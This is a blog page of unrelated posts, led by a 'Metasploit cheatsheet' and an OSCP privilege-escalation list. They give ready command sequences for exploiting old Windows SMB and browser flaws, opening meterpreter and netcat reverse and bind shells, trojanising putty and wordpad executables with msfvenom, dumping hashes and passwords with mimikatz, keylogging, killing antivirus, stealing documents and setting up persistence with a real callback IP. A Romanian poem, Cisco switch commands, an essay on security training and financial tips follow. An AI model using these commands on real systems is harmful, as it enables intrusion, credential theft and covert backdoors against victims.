Tuesday, June 28, 2022

METASPLOIT CHEATSHEET

 

METASPLOIT CHEATSHEET


Commands Only (Not for Script Kiddies):

1Hacking Windows XP with Metasploit tutorial - VNC remote control

use windows/smb/ms08_067_netapi
show optios
set RHOST 192.168.1.1
set payload windows/vncinject/bind_tcp
exploit


2.Metasploit vs Windows 7 and AVG
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOT 192.168.1.10 
set LPORT 5555
exploit
ps
migrate 1880
cd c:\ ls
download program-7.exe /root
run killav
shell


3. Hacking By Metasploit . Windows xp Sp3 . With B14CK_B34RD
use windows/smb/ms08_067_netapi
set LHOST 192.168.1.10
set RHOST 192.168.1.1
set payload windows/meterpreter/reverse_tcp
exploit


4.hacking win7 with metasploit
nmap -sS -v -PN 192.168.1-255
use exploit/multi/handler
set LHOST 192.168.1.10
set LPORT 5555
set payload windows/meterpreter/reverse_tcp
show optios
set EndOnSession false
show optios
set RHOST 192.168.1.1
set RPORT 4321
show options
exploit


5. Metasploit --- Explotando vulnerabilidad en Windows 7
sudo nmap 192.168.---cek target dengan nmap------>445/tcp_open microsoft-ds
use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
set RHOST 192.168.1.1
set RPORT 445
run ----run the exploit


6. Metasploit backdooring
msf3#./msfpayloa windows/meterpreter/reverse_tcp LHOST=192.168.1.1 R |./msfconsole -t
exe -x /tmp/kislay.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5
root@b14ck# cd /tmp---->kislay.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
show options
exploit

Meterpretr>
?
getuid
use priv
hashdump
keyscan_start
keyscan_dump
sysinfo
msg * ------->msg displayed on the screen


7. ms10 025 metasploit exploitation
nmap -O 192.168.1.7-----see the target operating system
search ms10
use exploit windows/mmsp/ms10_25_wmss_connect_funnel
set payload windows/shell_bind_tcp
show options
set RHOST 192.168.1.1
exploit


8. IEPeers: ms10_08_ie_behaviors Exploit
search iepeers
use windows/browser/ms10_018_ie_behaviors
set PAYLOAD windows/exec
show options
set SRVHOST 192.168.1.1
set URIPATH /
set CMD calc.exe
set target 1
info---->Available targets ;1 IE 6 spo-sp2 (onclick)
exploit
using url: http://192.168.1.1:8080/
open the browser mozilla or whatever browser used
type: http://192.168.1.1:8080/---enter
wait a few moments...


9. metasploit rpc_dum
nmap -sS 192.168...
135/TCP open
use msrpc_dcom_ms03_026
set payload win32_reverse_meterpreter
show options
set RHOST 192.168.1.1
set LHOST 192.168.1.10
exploit
help
use -m process
execute -f cmd.exe -c
interact 1
c:\winnt\system32\>dir


10.Uploading A Backdoor Metasploit Netcat
meterpreter> upload netcat.exe c:\\WINDOWS\\SYSTEM32\\
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run
meterpreter> reg setval -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run -v windows live -d "c:\\WINDOWS\\SYSTEM32\\netcat.exe -L -d -p 5555 -e cmd.exe
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run
meterpreter> reboot
bt~# nc 192.168.1.1 5555


11. BackTrack 4 R1 Metasploit 3 & SET, Hacking Windows 7
cd /pentest/exploits/SET
./set
Enter you choice: 4
enter the ip addres : 192.168.1.1
enter chose ( hit enter for default): 2
enter chose ( hit enter for default):16
set port 4444
open Konqueror /pentest/exploits/SET/
media/sda3---------->msf.exe
cd /pentest/exploits/SET# cd ..
/pentest/exploits# cd framework3
./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168..
set lport 4444
exploit
use priv
help
excecute -f cmd
ipconfig
shell
screenhot
excecute -f explorer


12. ms067 + netcat backdoor
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST
set LHOST
exploit
upload /root/nc.exe c:\\WINDOWS\\SYSTEM32\\

MORE Advanced Phun:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false
# set AutoRunScript pathto script you want to autorun after exploit is run
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30

exploit -j -z

____________________________________________________________________

# file_autopwn
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3

wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR...s/nga10_02.pdf

./msfconsole

db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21

setg INFILENAME /tmp/file3.pdf


use auxiliary/server/file_autopwn

set OUTPATH /tmp/1

set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run

________________________________________________________________________

# shows all the scripts
run [tab]

________________________________________________________________________

# persistence! broken ...if you use DNS name ..
run persistence -r 75.139.158.51 -p 21 -A -X -i 30

________________________________________________________________________

run get_pidgin_creds

idletime
sysinfo

________________________________________________________________________

# SYSTEM SHELL ( pick a proc that is run by system )
migrate 376
shell

________________________________________________________________________

# session hijack tokens
use incognito
impersonate_token "NT AUTHORITY\\SYSTEM"

________________________________________________________________________

# escalate to system
use priv
getsystem

________________________________________________________________________

execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t

________________________________________________________________________

# list top used apps
run prefetchtool -x 20
________________________________________________________________________
# list installed apps
run prefetchtool -p
________________________________________________________________________
run get_local_subnets
________________________________________________________________________
# find and download files
run search_dwld "%USERPROFILE%\\my documents" passwd
run search_dwld "%USERPROFILE%\\desktop passwd
run search_dwld "%USERPROFILE%\\my documents" office
run search_dwld "%USERPROFILE%\\desktop" office
________________________________________________________________________
# alternate
download -r "%USERPROFILE%\\desktop" ~/
download -r "%USERPROFILE%\\my documents" ~/
________________________________________________________________________
# alternate to shell not SYSTEM
# execute -f cmd.exe -H -c -i -t
________________________________________________________________________

# does some run wmic commands etc
run winenum
________________________________________________________________________


# rev shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"
________________________________________________________________________
# An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.
run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
________________________________________________________________________
# vnc / port fwd for linux
run vnc
________________________________________________________________________
# priv esc
run kitrap0d

________________________________________________________________________

run getgui
________________________________________________________________________
# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!
run killav

run winemun

run memdump

run screen_unlock
_________________________________________________________________________
upload /tmp/system32.exe C:\\windows\\system32\\
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion \\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion \\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion \\Run -v system32
reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list
reg setval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v system32
upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"

__________________________________________________________________________


getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80"
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666
___________________________________________________________________________
shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787
___________________________________________________________________________
run msf_bind
run msf_bind -p 1975
rev2self
getuid
___________________________________________________________________________
getuid



enumdesktops
grabdesktop

run deploymsf -f framework-3.3-dev.exe

run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d google.com
run netenum -rl -r 10.192.0.50-10.192.0.254
run netenum -st -d google.com
run netenum -ps -r 10.192.0.50-254

________________________________________________________________________
# Windows Login Brute Force Meterpreter Script
run winbf -h
________________________________________________________________________
# upload a script or executable and run it
uploadexec

________________________________________________________________________
# Using Payload As A Backdoor from a shell

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe" /ED 11/11/2011

_________________________________________________________________________

# kill AV this will not unload it from mem it needs reboot or kill from memory still ... Darkspy, Seem, Icesword GUI can kill the tasks
catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" dummy
__________________________________________________________________________

email me@ pris@tyrellcorp.net

Monday, June 27, 2022

Decebal catre popor

 5 noiembrie 2012

Cosbuc: Viata asta-i bun pierdut
Când n-o traiesti cum ai fi vrut!
Si-acum ar vrea un neam calau
S-arunce jug în gâtul tau:
E rau destul ca ne-am nascut,
Mai vrem si-al doilea rau?

Din zei de-am fi scoborâtori,
C-o moarte tot suntem datori!
Totuna e dac-ai murit
Flacau ori mos îngârbovit;
Dar nu-i totuna leu sa mori
Ori câine-nlantuit.

Cei ce se lupta murmurând,
De s-ar lupta si-n primul rând,
Ei tot atât de buni ne par
Ca orisicare las fugar!
Murmurul, azi si orisicând,
E plânset în zadar!

Iar a tacea si lasii stiu!
Toti mortii tac! Dar cine-i viu
Sa râda! Bunii râd si cad!
Sa râdem, dar, viteaz rasad,
Sa fie-un hohotit si-un chiu
Din ceruri pâna-n iad!

De-ar curge sângele pârau,
Nebiruit e bratul tau
Când mortii-n fata nu tresari!
Si însuti tie-un zeu îti pari
Când râzi de ce se tem mai rau
Dusmanii tai cei tari.

Ei sunt romani! Si ce mai sunt?
Nu ei, ci de-ar veni Cel-sfânt,
Zamolxe, c-un întreg popor
De zei, i-am întreba: ce vor?
Si nu le-am da nici lor pamânt
Caci ei au cerul lor!

Si-acum, barbati, un fier si-un scut!
E rau destul ca ne-am nascut:
Dar cui i-e frica de razboi
E liber de-a pleca napoi,
Iar cine-i vânzator vândut
Sa iasa dintre noi!

Eu nu mai am nimic de spus!
Voi bratele jurând le-ati pus
Pe scut! Puterea este-n voi
Si-n zei! Dar va gânditi, eroi,
Ca zeii sunt departe, sus,
Dusmanii lânga noi!

Decebal catre popor

OSCP PWK privilege escalation commands

execute -H -i -c -m -d calc.exe -f "c:\\Mcafee\\mimikatz.exe" -a ‘”sekurlsa::logonPasswords full” exit’

msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=10.0.0.100 LPORT=443 -x wordpad.exe -k -f exe -o wordpad1.exe

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai LHOST=192.168.2.7 LPORT=443 -f exe -o iexplore.exe

sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"

sc config upnphost binpath= "C:\McAfee\iexplore.exe -e C:\WINDOWS\System32\cmd.exe"


accesschk.exe /accepteula -uwcqv "Authenticated Users" *

Another tweak to the runas technique is to use a powershell one liner so the user gets a prompt with a known signed exe rather than an unknown yellow warning prompt.

sc config upnphost binpath= "C:\McAfee\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\spoolsv.exe"

msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' D > /root/Desktop/evil.dll

msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -f dll -o evil.dll

Daily useful CISCO commands

show running-config interface gigabitEthernet 2/0/14

show mac address-table interface gigabitEthernet 2/0/14

show mac address-table address 0014.6a7c.c2b8

show interfaces gigabitEthernet 2/0/14

#########
US-2960XR-STACK#show interfaces gigabitEthernet 2/0/14 switchport
Name: Gi2/0/14
Switchport: Enabled
Administrative Mode: static access
Operational Mode: static access
Administrative Trunking Encapsulation: dot1q
Operational Trunking Encapsulation: native
Negotiation of Trunking: Off
Access Mode VLAN: 12 (MG)
Trunking Native Mode VLAN: 1 (default)
Administrative Native VLAN tagging: enabled
Voice VLAN: 248 (SA-VOIP)
Administrative private-vlan host-association: none
Administrative private-vlan mapping: none
Administrative private-vlan trunk native VLAN: none
Administrative private-vlan trunk Native VLAN tagging: enabled
Administrative private-vlan trunk encapsulation: dot1q
Administrative private-vlan trunk normal VLANs: none
Administrative private-vlan trunk associations: none
Administrative private-vlan trunk mappings: none
Operational private-vlan: none
Trunking VLANs Enabled: ALL
Pruning VLANs Enabled: 2-1001
Capture Mode Disabled
Capture VLANs Allowed: ALL

Protected: false
Unknown unicast blocked: disabled
Unknown multicast blocked: disabled
Appliance trust: none
########

US-2960XR-STACK#show interfaces gigabitEthernet 2/0/14 status

Port      Name               Status       Vlan       Duplex  Speed Type
Gi2/0/14  MG-cell     connected    12         a-full a-1000 10/100/1000BaseTX

#######

US-2960XR-STACK#show interfaces description

######## Unused Cisco Ports Lake Forest ##############

show int | i proto.*notconnect|proto.*administratively down|Last in.* [6-9]w|Last in.*[0-9][0-9]w|[0-9]y|disabled|Last input never, output never, output hang never

Last input never, output never, output hang never
  Last input 45w1d, output 00:00:00, output hang never
  Last input 50w3d, output 00:00:00, output hang never
GigabitEthernet1/0/30 is down, line protocol is down (notconnect)
  Last input never, output 10w5d, output hang never
GigabitEthernet1/0/32 is down, line protocol is down (notconnect)
  Last input 11w2d, output 3d04h, output hang never
GigabitEthernet1/0/34 is down, line protocol is down (notconnect)
GigabitEthernet1/0/35 is administratively down, line protocol is down (disabled)
  Last input never, output never, output hang never
GigabitEthernet1/0/42 is down, line protocol is down (notconnect)
  Last input never, output never, output hang never
GigabitEthernet1/0/44 is down, line protocol is down (notconnect)
  Last input 22w3d, output 22w0d, output hang never
GigabitEthernet1/0/45 is down, line protocol is down (notconnect)
  Last input never, output never, output hang never
GigabitEthernet1/0/47 is down, line protocol is down (notconnect)
  Last input 22w3d, output 22w0d, output hang never







Why MOST cybersecurity training doesn't work!

 Why Most Cyber Security Training Doesn't Work

There’s been a lot of debate lately about whether or not cyber security training is worth the investment. To engage in this debate, it is important that all parties have a common definition of cyber security training. If we define cyber security training as the act of herding people into a classroom once a year (or upon hire) to sit through the boring, antiquated style of training session that emerged 15-20 years ago, then I would have to agree, don’t bother with the investment. There are studies which prove this style of training doesn’t work.

Unfortunately, as the rest of the cyber security industry has evolved, the basics of cyber security training have pretty much stayed the same. I have actually seen people using the same annual PowerPoint training material for 7+ years. This outdated model of training will not help defend a company against evolving cyber-attacks. But I have also seen companies achieve quantifiable results with new models of cyber security training that employ interactive software modules and games to engage users, coupled with simulated attacks to assess them.

I think it is more accurate to say that security professionals know that traditional training isn’t working, but they have not found other options. They either aren’t willing to invest the time to update the content, or aren’t willing to invest money to change the training methods.

Why does most cyber security training fail today?

1)      It’s boring;

2)      It lacks user interaction and involvement;

3)      There’s no measurement;

4)      We scare versus teach;

5)      Education is not a security team’s core competency.

However, based on our work with customers and extensive scientific research, security training does yield measurable results. Let’s review in more detail why traditional training fails and how to approach it differently:

Make it engaging -- Traditional cyber security training is boring, out of context, and way too long! With today’s attention deficient society, training has to evolve to be successful in reducing the threats for an organization. Many of today’s training methods are not compelling to users and many times the content is so overwhelming that companies lose users a few minutes into the training session. They’ll doze off, start checking their smart phone or politely zone out while looking attentive.

New methods of effective training canprovide users with practical advice in a topically focused software-based training session that takes less than 10 minutes.

Involve the user -- In addition to being boring, there is limited chance for users to interact and actually practice what they learn. Now, I’m not talking about a quiz. Quizzes don’t teach, they test. Answering quiz questions out of context shouldn’t be confused with practice. Practice helps users put concepts to use, so they learn the right behaviors. We all know the scenario: You start the video at your desk, and then go about doing your other day-to-day business. At the end of the video, you guess your way through a few questions, hit enter and hope for the best. If you’re a good guesser…voila!... you get your shiny new certificate of completion, and the security team can put a check mark on their annual objectives . But was anything learned?

Instead, cutting-edge training deploys interactive techniques where users are asked to practice concepts as they learn them, thereby engaging the user and enforcing learning as they go. For example, employees can complete their session by making decisions in a variety of security scenarios to apply what they’ve just learned, thereby increasing learning retention.

Measure success -- If you don’t measure, how do you know if you are being successful? What valuable data did you collect in the process? Was it actionable? The goal of security training has been to “check the box,” whether for an audit, compliance reasons or to show to your managers that you are doing your job. Successful training needs to be measured and provide actionable data about the strengths and weaknesses in your organization. Anything less is a waste of time.

Effective training collects user interaction and data throughout the training to give security professionals intelligence on an individual employee, as well as aggregate strengths and weaknesses in their organization. This data also helps to show improved knowledge over time.

Enlighten, don’t scare -- For some reason, we have come to believe that we need to scare people to get them to act differently. The problem is that by scaring workers we are actually impacting their ability to get their jobs done. They become afraid to open emails, to access systems and to do their daily jobs. Yes, training needs to break through, but paralyzing an organization in fear is counter-productive. Instead, good training has the potential to empower employees to take full advantage of the Internet’s benefits, while protecting themselves and their employers from potential security breaches.

Use learning science principles -- If you are a hacker, are you automatically an effective teacher? If you know the technology and all of its weaknesses, then it seems reasonable that you should be able to teach the same information to employees, right? Possibly, but not likely. If you ask a bunch of hackers whether training is working, what answer do you expect to get? Everyone has strengths and weaknesses, but generally hackers don’t make good educators and technologists are better off making technology decisions.

If companies want to see results with cyber security training, a shift in mindset is required. The science of learning dates back to the early 1950s, and its techniques have been proven over time and adopted as accepted learning principles. Applied to information security training, these techniques can provide immediate, tangible, long-term results in educating employees and improving your company's overall security posture. Let’s conduct training based on how people actually learn versus treating training as a check-box activity, and we’ll see just how valuable an investment in security training can be.

In the words of Einstein, “Insanity is doing the same thing over and over again and expecting different results.” Thankfully, when it comes to cyber security training it’s possible to stay sane by embracing the advances in security training which are available today.

How to Turn Social Media into a business?

 Turn Social Media into a business?

1) Progression
2) Your goal is Steady growth, not fast growth!
3) Become a storyteller
4) Vlogging (video blogging) (to tell a story)

###########

7 Social media platforms:
1. Instagram (just highlights of events)
2. YouTube (long form)
3. Snapchat (the new TV, least trash talking)
4. Facebook (all of the marketing at once) (not as cool anymore, but it's a scrolling tool and a mix of everything) (great ad platform, data company)
5. Podcast (it's a radio, hands/eye free while playing something)
6. Twitter (chatter, trash, news, fun)
7. Live streaming (virtual reality, the most interactive with lots of comments)
8. The 'Wild card' is email lists (old school and powerful)

###########


Richest man in Babylon

 The Richest Man in Bablyon has 7 basic principles:

1) Start thy purse to fattening - save/invest
2) Control thy expenditures - watch out for self serving brokers
3) Make thy gold mutiply - use powerful investments
4) Guard thy treasures from loss - watch out for brokers with their hot tips.
5) Make of thy dwelling a profitable investment - rental properties, your own home---but stay within your means.
6) Insure a future income - do work that you love to do. Become excellent at it.
7) Increase thy ability to earn - education never stops. Keep reading good books like this one, The Millionaire Next Door, Rich Dad Poor Dad and so on.